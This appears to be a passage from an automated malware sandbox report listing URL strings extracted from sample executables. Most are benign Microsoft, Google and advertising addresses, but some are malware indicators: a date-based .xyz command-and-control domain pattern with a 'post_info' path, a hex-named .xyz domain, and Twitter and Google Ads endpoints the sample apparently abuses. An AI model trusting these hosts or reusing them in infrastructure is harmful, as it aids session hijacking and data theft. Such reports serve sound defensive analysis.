Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xssM.img?h=75&w=100
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xzm6.img?h=250&w=30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yFoT.img?h=75&w=100
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7hjL.img?h=16&w=16&m=
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
Source: MiniThunderPlatform.exe.2.dr String found in binary or memory: http://store.paycenter.uc.cn
Source: MiniThunderPlatform.exe.2.dr String found in binary or memory: http://store.paycenter.uc.cnmail-attachment.googleusercontent.com
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Cyfj6XGbkd.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 56BB1610C0318054.exe, 00000002.00000003.277066236.00000000031B9000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: 56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp String found in binary or memory: http://www.interestvideo.com/video1.php
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: 56BB1610C0318054.exe, 00000002.00000003.277318880.000000000311B000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromeJk
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804
Source: ecvD64F.tmp.8.dr String found in binary or memory: http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate
Source: 1611971443428.exe, 00000008.00000002.270080121.0000000000198000.00000004.00000010.sdmp String found in binary or memory: http://www.nirsoft.net
Source: 1611971443428.exe, 1611971443428.exe.2.dr String found in binary or memory: http://www.nirsoft.net/
Source: download_engine.dll.2.dr String found in binary or memory: http://www.openssl.org/support/faq.html
Source: download_engine.dll.2.dr String found in binary or memory: http://www.openssl.org/support/faq.html....................
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.vb-audio.com
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.vb-cable.com
Source: Cyfj6XGbkd.exe String found in binary or memory: http://www.vb-cable.comVBCABLE
Source: download_engine.dll.2.dr String found in binary or memory: http://www.xunlei.com/
Source: download_engine.dll.2.dr String found in binary or memory: http://www.xunlei.com/GET
Source: 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp String found in binary or memory: http://www.youtube.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4476872748356;g
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674
Source: 56BB1610C0318054.exe, 00000002.00000003.329844310.0000000002AB7000.00000004.00000040.sdmp String found in binary or memory: https://A5D4CE54CC78B3CA.xyz/
Source: Web Data1611971454381.2.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://accounts.google.com
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/GaiaInfoService/Get?authuser=0&rpcTrackingId=GaiaInfoService.Get%3A
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/UserByGaiaService/Get?authuser=0&rpcTrackingId=UserByGaiaService.Ge
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/_/rpc/UserCustomerAccessService/List?authuser=0&rpcTrackingId=UserCustome
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/selectaccount
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.com/nav/selectaccountocation:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://ads.google.comsec-fetch-dest:
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/update.json
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://apis.google.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC54c8a2b02c3446f48a60b41e8a5ff47
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC9b2d2bc73c8a4a1d8dd5c3d69b6634a
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
Source: Web Data1611971454381.2.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 56BB1610C0318054.exe, 00000004.00000003.259422321.0000000002F40000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: 56BB1610C0318054.exe, 00000004.00000003.258743685.0000000002FCB000.00000004.00000001.sdmp, background.js.4.dr String found in binary or memory: https://chrome.google.com/webstore/category/extension
Source: 56BB1610C0318054.exe, 00000004.00000003.259091909.00000000020EC000.00000004.00000001.sdmp String found in binary or memory: https://chrome.google.com/webstoreAA
Source: 56BB1610C0318054.exe String found in binary or memory: https://clients2.google.com/service/update2/cr
Source: 56BB1610C0318054.exe, 00000004.00000003.259422321.0000000002F40000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 56BB1610C0318054.exe, 00000004.00000003.259071700.0000000002F53000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx4
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxa
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxo
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://content.googleapis.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/48/nrrV18753.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: 56BB1610C0318054.exe, 00000002.00000002.334703397.000000000340F000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.262859007.000000000325F000.00000004.00000001.sdmp String found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
Source: Cyfj6XGbkd.exe String found in binary or memory: https://d.symcb.com/cps0%
Source: Cyfj6XGbkd.exe String found in binary or memory: https://d.symcb.com/rpa0
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD3B6173
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp String found in binary or memory: https://docs.google.com/
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258915262.0000000002F77000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/?usp=chrome_appk/B
Source: 56BB1610C0318054.exe String found in binary or memory: https://drive.google.com/drive/settings
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://drive.google.com/drive/settingsawl7
Source: Web Data1611971454381.2.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Web Data1611971454381.2.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Web Data1611971454381.2.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://feedback.googleusercontent.com
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.googleapis.com/css?family=Google
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com;
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
Source: 56BB1610C0318054.exe String found in binary or memory: https://hangouts.google.com/
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 56BB1610C0318054.exe String found in binary or memory: https://mail.google.com/mail
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 56BB1610C0318054.exe String found in binary or memory: https://payments.google.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://pki.goog/repository/0
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 56BB1610C0318054.exe String found in binary or memory: https://sandbox.google.com/
Source: 56BB1610C0318054.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 56BB1610C0318054.exe String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: Web Data1611971454381.2.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Web Data1611971454381.2.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvD64F.tmp.8.dr String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_divxpt
Source: 56BB1610C0318054.exe, 00000002.00000003.277190351.000000000318F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 56BB1610C0318054.exe, 00000002.00000003.277158883.0000000003117000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000002.00000003.329732369.000000000311B000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 56BB1610C0318054.exe, 00000002.00000003.277158883.0000000003117000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 56BB1610C0318054.exe, 00000002.00000003.277190351.000000000318F000.00000004.00000001.sdmp String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/ookie:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comReferer:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
